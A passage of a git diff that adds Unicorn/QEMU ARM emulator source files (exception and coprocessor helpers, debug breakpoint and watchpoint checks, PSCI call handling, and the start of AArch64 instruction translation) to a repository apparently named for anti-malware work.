raise_exception(env, EXCP_UDEF); + } + + if (!ri->accessfn) { + return; + } + + switch (ri->accessfn(env, ri)) { + case CP_ACCESS_OK: + return; + case CP_ACCESS_TRAP: + env->exception.syndrome = syndrome; + break; + case CP_ACCESS_TRAP_UNCATEGORIZED: + env->exception.syndrome = syn_uncategorized(); + break; + default: + g_assert_not_reached(); + } + raise_exception(env, EXCP_UDEF); +} + +void HELPER(set_cp_reg)(CPUARMState *env, void *rip, uint32_t value) +{ + const ARMCPRegInfo *ri = rip; + + ri->writefn(env, ri, value); +} + +uint32_t HELPER(get_cp_reg)(CPUARMState *env, void *rip) +{ + const ARMCPRegInfo *ri = rip; + + return ri->readfn(env, ri); +} + +void HELPER(set_cp_reg64)(CPUARMState *env, void *rip, uint64_t value) +{ + const ARMCPRegInfo *ri = rip; + + ri->writefn(env, ri, value); +} + +uint64_t HELPER(get_cp_reg64)(CPUARMState *env, void *rip) +{ + const ARMCPRegInfo *ri = rip; + + return ri->readfn(env, ri); +} + +void HELPER(msr_i_pstate)(CPUARMState *env, uint32_t op, uint32_t imm) +{ + /* MSR_i to update PSTATE. This is OK from EL0 only if UMA is set. + * Note that SPSel is never OK from EL0; we rely on handle_msr_i() + * to catch that case at translate time. + */ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_UMA)) { + raise_exception(env, EXCP_UDEF); + } + + switch (op) { + case 0x05: /* SPSel */ + update_spsel(env, imm); + break; + case 0x1e: /* DAIFSet */ + env->daif |= (imm << 6) & PSTATE_DAIF; + break; + case 0x1f: /* DAIFClear */ + env->daif &= ~((imm << 6) & PSTATE_DAIF); + break; + default: + g_assert_not_reached(); + } +} + +void HELPER(clear_pstate_ss)(CPUARMState *env) +{ + env->pstate &= ~PSTATE_SS; +} + +void HELPER(pre_hvc)(CPUARMState *env) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int cur_el = arm_current_el(env); + /* FIXME: Use actual secure state. */ + bool secure = false; + bool undef; + + if (arm_is_psci_call(cpu, EXCP_HVC)) { + /* If PSCI is enabled and this looks like a valid PSCI call then + * that overrides the architecturally mandated HVC behaviour. + */ + return; + } + + if (!arm_feature(env, ARM_FEATURE_EL2)) { + /* If EL2 doesn't exist, HVC always UNDEFs */ + undef = true; + } else if (arm_feature(env, ARM_FEATURE_EL3)) { + /* EL3.HCE has priority over EL2.HCD. */ + undef = !(env->cp15.scr_el3 & SCR_HCE); + } else { + undef = env->cp15.hcr_el2 & HCR_HCD; + } + + /* In ARMv7 and ARMv8/AArch32, HVC is undef in secure state. + * For ARMv8/AArch64, HVC is allowed in EL3. + * Note that we've already trapped HVC from EL0 at translation + * time. + */ + if (secure && (!is_a64(env) || cur_el == 1)) { + undef = true; + } + + if (undef) { + env->exception.syndrome = syn_uncategorized(); + raise_exception(env, EXCP_UDEF); + } +} + +void HELPER(pre_smc)(CPUARMState *env, uint32_t syndrome) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int cur_el = arm_current_el(env); + bool secure = arm_is_secure(env); + bool smd = env->cp15.scr_el3 & SCR_SMD; + /* On ARMv8 AArch32, SMD only applies to NS state. + * On ARMv7 SMD only applies to NS state and only if EL2 is available. + * For ARMv7 non EL2, we force SMD to zero so we don't need to re-check + * the EL2 condition here. + */ + bool undef = is_a64(env) ? smd : (!secure && smd); + + if (arm_is_psci_call(cpu, EXCP_SMC)) { + /* If PSCI is enabled and this looks like a valid PSCI call then + * that overrides the architecturally mandated SMC behaviour. + */ + return; + } + + if (!arm_feature(env, ARM_FEATURE_EL3)) { + /* If we have no EL3 then SMC always UNDEFs */ + undef = true; + } else if (!secure && cur_el == 1 && (env->cp15.hcr_el2 & HCR_TSC)) { + /* In NS EL1, HCR controlled routing to EL2 has priority over SMD. */ + env->exception.syndrome = syndrome; + raise_exception(env, EXCP_HYP_TRAP); + } + + if (undef) { + env->exception.syndrome = syn_uncategorized(); + raise_exception(env, EXCP_UDEF); + } +} + +void HELPER(exception_return)(CPUARMState *env) +{ + int cur_el = arm_current_el(env); + unsigned int spsr_idx = aarch64_banked_spsr_index(cur_el); + uint32_t spsr = env->banked_spsr[spsr_idx]; + int new_el, i; + + aarch64_save_sp(env, cur_el); + + env->exclusive_addr = -1; + + /* We must squash the PSTATE.SS bit to zero unless both of the + * following hold: + * 1. debug exceptions are currently disabled + * 2. singlestep will be active in the EL we return to + * We check 1 here and 2 after we've done the pstate/cpsr write() to + * transition to the EL we're going to. + */ + if (arm_generate_debug_exceptions(env)) { + spsr &= ~PSTATE_SS; + } + + if (spsr & PSTATE_nRW) { + /* TODO: We currently assume EL1/2/3 are running in AArch64. */ + env->aarch64 = 0; + new_el = 0; + env->uncached_cpsr = 0x10; + cpsr_write(env, spsr, ~0); + if (!arm_singlestep_active(env)) { + env->uncached_cpsr &= ~PSTATE_SS; + } + for (i = 0; i < 15; i++) { + env->regs[i] = env->xregs[i]; + } + + env->regs[15] = env->elr_el[1] & ~0x1; + } else { + new_el = extract32(spsr, 2, 2); + if (new_el > cur_el + || (new_el == 2 && !arm_feature(env, ARM_FEATURE_EL2))) { + /* Disallow return to an EL which is unimplemented or higher + * than the current one. + */ + goto illegal_return; + } + if (extract32(spsr, 1, 1)) { + /* Return with reserved M[1] bit set */ + goto illegal_return; + } + if (new_el == 0 && (spsr & PSTATE_SP)) { + /* Return to EL0 with M[0] bit set */ + goto illegal_return; + } + env->aarch64 = 1; + pstate_write(env, spsr); + if (!arm_singlestep_active(env)) { + env->pstate &= ~PSTATE_SS; + } + aarch64_restore_sp(env, new_el); + env->pc = env->elr_el[cur_el]; + } + + return; + +illegal_return: + /* Illegal return events of various kinds have architecturally + * mandated behaviour: + * restore NZCV and DAIF from SPSR_ELx + * set PSTATE.IL + * restore PC from ELR_ELx + * no change to exception level, execution state or stack pointer + */ + env->pstate |= PSTATE_IL; + env->pc = env->elr_el[cur_el]; + spsr &= PSTATE_NZCV | PSTATE_DAIF; + spsr |= pstate_read(env) & ~(PSTATE_NZCV | PSTATE_DAIF); + pstate_write(env, spsr); + if (!arm_singlestep_active(env)) { + env->pstate &= ~PSTATE_SS; + } +} + +/* Return true if the linked breakpoint entry lbn passes its checks */ +static bool linked_bp_matches(ARMCPU *cpu, int lbn) +{ + CPUARMState *env = &cpu->env; + uint64_t bcr = env->cp15.dbgbcr[lbn]; + int brps = extract32(cpu->dbgdidr, 24, 4); + int ctx_cmps = extract32(cpu->dbgdidr, 20, 4); + int bt; + uint32_t contextidr; + + /* Links to unimplemented or non-context aware breakpoints are + * CONSTRAINED UNPREDICTABLE: either behave as if disabled, or + * as if linked to an UNKNOWN context-aware breakpoint (in which + * case DBGWCR_EL1.LBN must indicate that breakpoint). + * We choose the former. + */ + if (lbn > brps || lbn < (brps - ctx_cmps)) { + return false; + } + + bcr = env->cp15.dbgbcr[lbn]; + + if (extract64(bcr, 0, 1) == 0) { + /* Linked breakpoint disabled : generate no events */ + return false; + } + + bt = extract64(bcr, 20, 4); + + /* We match the whole register even if this is AArch32 using the + * short descriptor format (in which case it holds both PROCID and ASID), + * since we don't implement the optional v7 context ID masking. + */ + contextidr = extract64(env->cp15.contextidr_el1, 0, 32); + + switch (bt) { + case 3: /* linked context ID match */ + if (arm_current_el(env) > 1) { + /* Context matches never fire in EL2 or (AArch64) EL3 */ + return false; + } + return (contextidr == extract64(env->cp15.dbgbvr[lbn], 0, 32)); + case 5: /* linked address mismatch (reserved in AArch64) */ + case 9: /* linked VMID match (reserved if no EL2) */ + case 11: /* linked context ID and VMID match (reserved if no EL2) */ + default: + /* Links to Unlinked context breakpoints must generate no + * events; we choose to do the same for reserved values too. + */ + return false; + } + + return false; +} + +static bool bp_wp_matches(ARMCPU *cpu, int n, bool is_wp) +{ + CPUARMState *env = &cpu->env; + uint64_t cr; + int pac, hmc, ssc, wt, lbn; + /* TODO: check against CPU security state when we implement TrustZone */ + bool is_secure = false; + + if (is_wp) { + if (!env->cpu_watchpoint[n] + || !(env->cpu_watchpoint[n]->flags & BP_WATCHPOINT_HIT)) { + return false; + } + cr = env->cp15.dbgwcr[n]; + } else { + uint64_t pc = is_a64(env) ? env->pc : env->regs[15]; + + if (!env->cpu_breakpoint[n] || env->cpu_breakpoint[n]->pc != pc) { + return false; + } + cr = env->cp15.dbgbcr[n]; + } + /* The WATCHPOINT_HIT flag guarantees us that the watchpoint is + * enabled and that the address and access type match; for breakpoints + * we know the address matched; check the remaining fields, including + * linked breakpoints. We rely on WCR and BCR having the same layout + * for the LBN, SSC, HMC, PAC/PMC and is-linked fields. + * Note that some combinations of {PAC, HMC, SSC} are reserved and + * must act either like some valid combination or as if the watchpoint + * were disabled. We choose the former, and use this together with + * the fact that EL3 must always be Secure and EL2 must always be + * Non-Secure to simplify the code slightly compared to the full + * table in the ARM ARM. + */ + pac = extract64(cr, 1, 2); + hmc = extract64(cr, 13, 1); + ssc = extract64(cr, 14, 2); + + switch (ssc) { + case 0: + break; + case 1: + case 3: + if (is_secure) { + return false; + } + break; + case 2: + if (!is_secure) { + return false; + } + break; + } + + /* TODO: this is not strictly correct because the LDRT/STRT/LDT/STT + * "unprivileged access" instructions should match watchpoints as if + * they were accesses done at EL0, even if the CPU is at EL1 or higher. + * Implementing this would require reworking the core watchpoint code + * to plumb the mmu_idx through to this point. Luckily Linux does not + * rely on this behaviour currently. + * For breakpoints we do want to use the current CPU state. + */ + switch (arm_current_el(env)) { + case 3: + case 2: + if (!hmc) { + return false; + } + break; + case 1: + if (extract32(pac, 0, 1) == 0) { + return false; + } + break; + case 0: + if (extract32(pac, 1, 1) == 0) { + return false; + } + break; + default: + g_assert_not_reached(); + } + + wt = extract64(cr, 20, 1); + lbn = extract64(cr, 16, 4); + + if (wt && !linked_bp_matches(cpu, lbn)) { + return false; + } + + return true; +} + +static bool check_watchpoints(ARMCPU *cpu) +{ + CPUARMState *env = &cpu->env; + int n; + + /* If watchpoints are disabled globally or we can't take debug + * exceptions here then watchpoint firings are ignored. + */ + if (extract32(env->cp15.mdscr_el1, 15, 1) == 0 + || !arm_generate_debug_exceptions(env)) { + return false; + } + + for (n = 0; n < ARRAY_SIZE(env->cpu_watchpoint); n++) { + if (bp_wp_matches(cpu, n, true)) { + return true; + } + } + return false; +} + +static bool check_breakpoints(ARMCPU *cpu) +{ + CPUARMState *env = &cpu->env; + int n; + + /* If breakpoints are disabled globally or we can't take debug + * exceptions here then breakpoint firings are ignored. + */ + if (extract32(env->cp15.mdscr_el1, 15, 1) == 0 + || !arm_generate_debug_exceptions(env)) { + return false; + } + + for (n = 0; n < ARRAY_SIZE(env->cpu_breakpoint); n++) { + if (bp_wp_matches(cpu, n, false)) { + return true; + } + } + return false; +} + +void arm_debug_excp_handler(CPUState *cs) +{ + /* Called by core code when a watchpoint or breakpoint fires; + * need to check which one and raise the appropriate exception. + */ + ARMCPU *cpu = ARM_CPU(cs->uc, cs); + CPUARMState *env = &cpu->env; + CPUWatchpoint *wp_hit = cs->watchpoint_hit; + + if (wp_hit) { + if (wp_hit->flags & BP_CPU) { + cs->watchpoint_hit = NULL; + if (check_watchpoints(cpu)) { + bool wnr = (wp_hit->flags & BP_WATCHPOINT_HIT_WRITE) != 0; + bool same_el = arm_debug_target_el(env) == arm_current_el(env); + + env->exception.syndrome = syn_watchpoint(same_el, 0, wnr); + if (extended_addresses_enabled(env)) { + env->exception.fsr = (1 << 9) | 0x22; + } else { + env->exception.fsr = 0x2; + } + env->exception.vaddress = wp_hit->hitaddr; + raise_exception(env, EXCP_DATA_ABORT); + } else { + cpu_resume_from_signal(cs, NULL); + } + } + } else { + if (check_breakpoints(cpu)) { + bool same_el = (arm_debug_target_el(env) == arm_current_el(env)); + env->exception.syndrome = syn_breakpoint(same_el); + if (extended_addresses_enabled(env)) { + env->exception.fsr = (1 << 9) | 0x22; + } else { + env->exception.fsr = 0x2; + } + /* FAR is UNKNOWN, so doesn't need setting */ + raise_exception(env, EXCP_PREFETCH_ABORT); + } + } +} + +/* ??? Flag setting arithmetic is awkward because we need to do comparisons. + The only way to do that in TCG is a conditional branch, which clobbers + all our temporaries. For now implement these as helper functions. */ + +/* Similarly for variable shift instructions. */ + +uint32_t HELPER(shl_cc)(CPUARMState *env, uint32_t x, uint32_t i) +{ + int shift = i & 0xff; + if (shift >= 32) { + if (shift == 32) + env->CF = x & 1; + else + env->CF = 0; + return 0; + } else if (shift != 0) { + env->CF = (x >> (32 - shift)) & 1; + return x << shift; + } + return x; +} + +uint32_t HELPER(shr_cc)(CPUARMState *env, uint32_t x, uint32_t i) +{ + int shift = i & 0xff; + if (shift >= 32) { + if (shift == 32) + env->CF = (x >> 31) & 1; + else + env->CF = 0; + return 0; + } else if (shift != 0) { + env->CF = (x >> (shift - 1)) & 1; + return x >> shift; + } + return x; +} + +uint32_t HELPER(sar_cc)(CPUARMState *env, uint32_t x, uint32_t i) +{ + int shift = i & 0xff; + if (shift >= 32) { + env->CF = (x >> 31) & 1; + return (int32_t)x >> 31; + } else if (shift != 0) { + env->CF = (x >> (shift - 1)) & 1; + return (int32_t)x >> shift; + } + return x; +} + +uint32_t HELPER(ror_cc)(CPUARMState *env, uint32_t x, uint32_t i) +{ + int shift1, shift; + shift1 = i & 0xff; + shift = shift1 & 0x1f; + if (shift == 0) { + if (shift1 != 0) + env->CF = (x >> 31) & 1; + return x; + } else { + env->CF = (x >> (shift - 1)) & 1; + return ((uint32_t)x >> shift) | (x << (32 - shift)); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/psci.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/psci.c new file mode 100644 index 0000000..5b305b1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/psci.c @@ -0,0 +1,242 @@ +/* + * Copyright (C) 2014 - Linaro + * Author: Rob Herring + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see . + */ +#include +#include +#include +#include +#include +#include "internals.h" + +bool arm_is_psci_call(ARMCPU *cpu, int excp_type) +{ + /* Return true if the r0/x0 value indicates a PSCI call and + * the exception type matches the configured PSCI conduit. This is + * called before the SMC/HVC instruction is executed, to decide whether + * we should treat it as a PSCI call or with the architecturally + * defined behaviour for an SMC or HVC (which might be UNDEF or trap + * to EL2 or to EL3). + */ + CPUARMState *env = &cpu->env; + uint64_t param = is_a64(env) ? env->xregs[0] : env->regs[0]; + + switch (excp_type) { + case EXCP_HVC: + if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_HVC) { + return false; + } + break; + case EXCP_SMC: + if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_SMC) { + return false; + } + break; + default: + return false; + } + + switch (param) { + case QEMU_PSCI_0_2_FN_PSCI_VERSION: + case QEMU_PSCI_0_2_FN_MIGRATE_INFO_TYPE: + case QEMU_PSCI_0_2_FN_AFFINITY_INFO: + case QEMU_PSCI_0_2_FN64_AFFINITY_INFO: + case QEMU_PSCI_0_2_FN_SYSTEM_RESET: + case QEMU_PSCI_0_2_FN_SYSTEM_OFF: + case QEMU_PSCI_0_1_FN_CPU_ON: + case QEMU_PSCI_0_2_FN_CPU_ON: + case QEMU_PSCI_0_2_FN64_CPU_ON: + case QEMU_PSCI_0_1_FN_CPU_OFF: + case QEMU_PSCI_0_2_FN_CPU_OFF: + case QEMU_PSCI_0_1_FN_CPU_SUSPEND: + case QEMU_PSCI_0_2_FN_CPU_SUSPEND: + case QEMU_PSCI_0_2_FN64_CPU_SUSPEND: + case QEMU_PSCI_0_1_FN_MIGRATE: + case QEMU_PSCI_0_2_FN_MIGRATE: + return true; + default: + return false; + } +} + +void arm_handle_psci_call(ARMCPU *cpu) +{ + /* + * This function partially implements the logic for dispatching Power State + * Coordination Interface (PSCI) calls (as described in ARM DEN 0022B.b), + * to the extent required for bringing up and taking down secondary cores, + * and for handling reset and poweroff requests. + * Additional information about the calling convention used is available in + * the document 'SMC Calling Convention' (ARM DEN 0028) + */ + CPUState *cs = CPU(cpu); + CPUARMState *env = &cpu->env; + uint64_t param[4]; + uint64_t context_id, mpidr; + target_ulong entry; + int32_t ret = 0; + int i; + + for (i = 0; i < 4; i++) { + /* + * All PSCI functions take explicit 32-bit or native int sized + * arguments so we can simply zero-extend all arguments regardless + * of which exact function we are about to call. + */ + param[i] = is_a64(env) ? env->xregs[i] : env->regs[i]; + } + + if ((param[0] & QEMU_PSCI_0_2_64BIT) && !is_a64(env)) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + goto err; + } + + switch (param[0]) { + CPUState *target_cpu_state; + ARMCPU *target_cpu; + CPUClass *target_cpu_class; + + case QEMU_PSCI_0_2_FN_PSCI_VERSION: + ret = QEMU_PSCI_0_2_RET_VERSION_0_2; + break; + case QEMU_PSCI_0_2_FN_MIGRATE_INFO_TYPE: + ret = QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED; /* No trusted OS */ + break; + case QEMU_PSCI_0_2_FN_AFFINITY_INFO: + case QEMU_PSCI_0_2_FN64_AFFINITY_INFO: + mpidr = param[1]; + + switch (param[2]) { + case 0: + target_cpu_state = qemu_get_cpu(env->uc, mpidr & 0xff); + if (!target_cpu_state) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + break; + } + target_cpu = ARM_CPU(env->uc, target_cpu_state); + ret = target_cpu->powered_off ? 1 : 0; + break; + default: + /* Everything above affinity level 0 is always on. */ + ret = 0; + } + break; + case QEMU_PSCI_0_2_FN_SYSTEM_RESET: + qemu_system_reset_request(env->uc); + /* QEMU reset and shutdown are async requests, but PSCI + * mandates that we never return from the reset/shutdown + * call, so power the CPU off now so it doesn't execute + * anything further. + */ + goto cpu_off; + case QEMU_PSCI_0_2_FN_SYSTEM_OFF: + qemu_system_shutdown_request(); + goto cpu_off; + case QEMU_PSCI_0_1_FN_CPU_ON: + case QEMU_PSCI_0_2_FN_CPU_ON: + case QEMU_PSCI_0_2_FN64_CPU_ON: + mpidr = param[1]; + entry = param[2]; + context_id = param[3]; + + /* change to the cpu we are powering up */ + target_cpu_state = qemu_get_cpu(env->uc, mpidr & 0xff); + if (!target_cpu_state) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + break; + } + target_cpu = ARM_CPU(env->uc, target_cpu_state); + if (!target_cpu->powered_off) { + ret = QEMU_PSCI_RET_ALREADY_ON; + break; + } + target_cpu_class = CPU_GET_CLASS(env->uc, target_cpu); + + /* Initialize the cpu we are turning on */ + cpu_reset(target_cpu_state); + target_cpu->powered_off = false; + target_cpu_state->halted = 0; + + /* + * The PSCI spec mandates that newly brought up CPUs enter the + * exception level of the caller in the same execution mode as + * the caller, with context_id in x0/r0, respectively. + * + * For now, it is sufficient to assert() that CPUs come out of + * reset in the same mode as the calling CPU, since we only + * implement EL1, which means that + * (a) there is no EL2 for the calling CPU to trap into to change + * its state + * (b) the newly brought up CPU enters EL1 immediately after coming + * out of reset in the default state + */ + assert(is_a64(env) == is_a64(&target_cpu->env)); + if (is_a64(env)) { + if (entry & 1) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + break; + } + target_cpu->env.xregs[0] = context_id; + } else { + target_cpu->env.regs[0] = context_id; + target_cpu->env.thumb = entry & 1; + } + target_cpu_class->set_pc(target_cpu_state, entry); + + ret = 0; + break; + case QEMU_PSCI_0_1_FN_CPU_OFF: + case QEMU_PSCI_0_2_FN_CPU_OFF: + goto cpu_off; + case QEMU_PSCI_0_1_FN_CPU_SUSPEND: + case QEMU_PSCI_0_2_FN_CPU_SUSPEND: + case QEMU_PSCI_0_2_FN64_CPU_SUSPEND: + /* Affinity levels are not supported in QEMU */ + if (param[1] & 0xfffe0000) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + break; + } + /* Powerdown is not supported, we always go into WFI */ + if (is_a64(env)) { + env->xregs[0] = 0; + } else { + env->regs[0] = 0; + } + helper_wfi(env); + break; + case QEMU_PSCI_0_1_FN_MIGRATE: + case QEMU_PSCI_0_2_FN_MIGRATE: + ret = QEMU_PSCI_RET_NOT_SUPPORTED; + break; + default: + g_assert_not_reached(); + } + +err: + if (is_a64(env)) { + env->xregs[0] = ret; + } else { + env->regs[0] = ret; + } + return; + +cpu_off: + cpu->powered_off = true; + cs->halted = 1; + cs->exception_index = EXCP_HLT; + cpu_loop_exit(cs); + /* notreached */ +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate-a64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate-a64.c new file mode 100644 index 0000000..52337b9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate-a64.c @@ -0,0 +1,11280 @@ +/* + * AArch64 translation + * + * Copyright (c) 2013 Alexander Graf + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include +#include +#include +#include +#include "unicorn/platform.h" + +#include "cpu.h" +#include "tcg-op.h" +#include "qemu/log.h" +#include "arm_ldst.h" +#include "translate.h" +#include "internals.h" +#include "qemu/host-utils.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +#ifdef CONFIG_USER_ONLY +static TCGv_i64 cpu_exclusive_test; +static TCGv_i32 cpu_exclusive_info; +#endif + +static const char *regnames[] = { + "x0", "x1", "x2", "x3", "x4", "x5", "x6", "x7", + "x8", "x9", "x10", "x11", "x12", "x13", "x14", "x15", + "x16", "x17", "x18", "x19", "x20", "x21", "x22", "x23", + "x24", "x25", "x26", "x27", "x28", "x29", "lr", "sp" +}; + +enum a64_shift_type { + A64_SHIFT_TYPE_LSL = 0, + A64_SHIFT_TYPE_LSR = 1, + A64_SHIFT_TYPE_ASR = 2, + A64_SHIFT_TYPE_ROR = 3 +}; + +/* Table based decoder typedefs - used when the relevant bits for decode + * are too awkwardly scattered across the instruction (eg SIMD). + */ +typedef void AArch64DecodeFn(DisasContext *s, uint32_t insn); + +typedef struct AArch64DecodeTable { + uint32_t pattern; + uint32_t mask; + AArch64DecodeFn *disas_fn; +} AArch64DecodeTable; + +/* Function prototype for gen_ functions for calling Neon helpers */ +typedef void NeonGenOneOpEnvFn(TCGContext *t, TCGv_i32, TCGv_ptr, TCGv_i32); +typedef void NeonGenTwoOpFn(TCGContext *t, TCGv_i32, TCGv_i32, TCGv_i32); +typedef void NeonGenTwoOpEnvFn(TCGContext *t, TCGv_i32, TCGv_ptr, TCGv_i32, TCGv_i32); +typedef void NeonGenTwo64OpFn(TCGContext *t, TCGv_i64, TCGv_i64, TCGv_i64); +typedef void NeonGenTwo64OpEnvFn(TCGContext *t, TCGv_i64, TCGv_ptr, TCGv_i64, TCGv_i64); +typedef void NeonGenNarrowFn(TCGContext *t, TCGv_i32, TCGv_i64); +typedef void NeonGenNarrowEnvFn(TCGContext *t, TCGv_i32, TCGv_ptr, TCGv_i64); +typedef void NeonGenWidenFn(TCGContext *t, TCGv_i64, TCGv_i32); +typedef void NeonGenTwoSingleOPFn(TCGContext *t, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr); +typedef void NeonGenTwoDoubleOPFn(TCGContext *t, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_ptr); +typedef void NeonGenOneOpFn(TCGContext *t, TCGv_i64, TCGv_i64); +typedef void CryptoTwoOpEnvFn(TCGContext *t, TCGv_ptr, TCGv_i32, TCGv_i32); +typedef void CryptoThreeOpEnvFn(TCGContext *t, TCGv_ptr, TCGv_i32, TCGv_i32, TCGv_i32); + +/* initialize TCG globals. */ +void a64_translate_init(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + int i; + + tcg_ctx->cpu_pc = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, pc), + "pc"); + for (i = 0; i < 32; i++) { + tcg_ctx->cpu_X[i] = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, xregs[i]), + regnames[i]); + } + + tcg_ctx->cpu_NF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, NF), "NF"); + tcg_ctx->cpu_ZF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, ZF), "ZF"); + tcg_ctx->cpu_CF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, CF), "CF"); + tcg_ctx->cpu_VF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, VF), "VF"); + + tcg_ctx->cpu_exclusive_addr = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_addr), "exclusive_addr"); + tcg_ctx->cpu_exclusive_val = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_val), "exclusive_val"); + tcg_ctx->cpu_exclusive_high = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_high), "exclusive_high"); +#ifdef CONFIG_USER_ONLY + cpu_exclusive_test = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_test), "exclusive_test"); + cpu_exclusive_info = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_info), "exclusive_info"); +#endif +} + +#if 0 +void aarch64_cpu_dump_state(CPUState *cs, FILE *f, + fprintf_function cpu_fprintf, int flags) +{ + ARMCPU *cpu = ARM_CPU(cs); + CPUARMState *env = &cpu->env; + uint32_t psr = pstate_read(env); + int i; + + cpu_fprintf(f, "PC=%016"PRIx64" SP=%016"PRIx64"\n", + env->pc, env->xregs[31]); + for (i = 0; i < 31; i++) { + cpu_fprintf(f, "X%02d=%016"PRIx64, i, env->xregs[i]); + if ((i % 4) == 3) { + cpu_fprintf(f, "\n"); + } else { + cpu_fprintf(f, " "); + } + } + cpu_fprintf(f, "PSTATE=%08x (flags %c%c%c%c)\n", + psr, + psr & PSTATE_N ? 'N' : '-', + psr & PSTATE_Z ? 'Z' : '-', + psr & PSTATE_C ? 'C' : '-', + psr & PSTATE_V ? 'V' : '-'); + cpu_fprintf(f, "\n"); + + if (flags & CPU_DUMP_FPU) { + int numvfpregs = 32; + for (i = 0; i < numvfpregs; i += 2) { + uint64_t vlo = float64_val(env->vfp.regs[i * 2]); + uint64_t vhi = float64_val(env->vfp.regs[(i * 2) + 1]); + cpu_fprintf(f, "q%02d=%016" PRIx64 ":%016" PRIx64 " ", + i, vhi, vlo); + vlo = float64_val(env->vfp.regs[(i + 1) * 2]); + vhi = float64_val(env->vfp.regs[((i + 1) * 2) + 1]); + cpu_fprintf(f, "q%02d=%016" PRIx64 ":%016" PRIx64 "\n", + i + 1, vhi, vlo); + } + cpu_fprintf(f, "FPCR: %08x FPSR: %08x\n", + vfp_get_fpcr(env), vfp_get_fpsr(env)); + } +} +#endif + +void gen_a64_set_pc_im(DisasContext *s, uint64_t val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_pc, val); +} + +static void gen_exception_internal(DisasContext *s, int excp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); + + assert(excp_is_internal(excp)); + gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tcg_excp); + tcg_temp_free_i32(tcg_ctx, tcg_excp); +} + +static void gen_exception(DisasContext *s, int excp, uint32_t syndrome) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); + TCGv_i32 tcg_syn = tcg_const_i32(tcg_ctx, syndrome); + + gen_helper_exception_with_syndrome(tcg_ctx, tcg_ctx->cpu_env, tcg_excp, tcg_syn); + tcg_temp_free_i32(tcg_ctx, tcg_syn); + tcg_temp_free_i32(tcg_ctx, tcg_excp); +} + +static void gen_exception_internal_insn(DisasContext *s, int offset, int excp) +{ + gen_a64_set_pc_im(s, s->pc - offset); + gen_exception_internal(s, excp); + s->is_jmp = DISAS_EXC; +} + +static void gen_exception_insn(DisasContext *s, int offset, int excp, + uint32_t syndrome) +{ + gen_a64_set_pc_im(s, s->pc - offset); + gen_exception(s, excp, syndrome); + s->is_jmp = DISAS_EXC; +} + +static void gen_ss_advance(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* If the singlestep state is Active-not-pending, advance to + * Active-pending. + */ + if (s->ss_active) { + s->pstate_ss = 0; + gen_helper_clear_pstate_ss(tcg_ctx, tcg_ctx->cpu_env); + } +} + +static void gen_step_complete_exception(DisasContext *s) +{ + /* We just completed step of an insn. Move from Active-not-pending + * to Active-pending, and then also take the swstep exception. + * This corresponds to making the (IMPDEF) choice to prioritize + * swstep exceptions over asynchronous exceptions taken to an exception + * level where debug is disabled. This choice has the advantage that + * we do not need to maintain internal state corresponding to the + * ISV/EX syndrome bits between completion of the step and generation + * of the exception, and our syndrome information is always correct. + */ 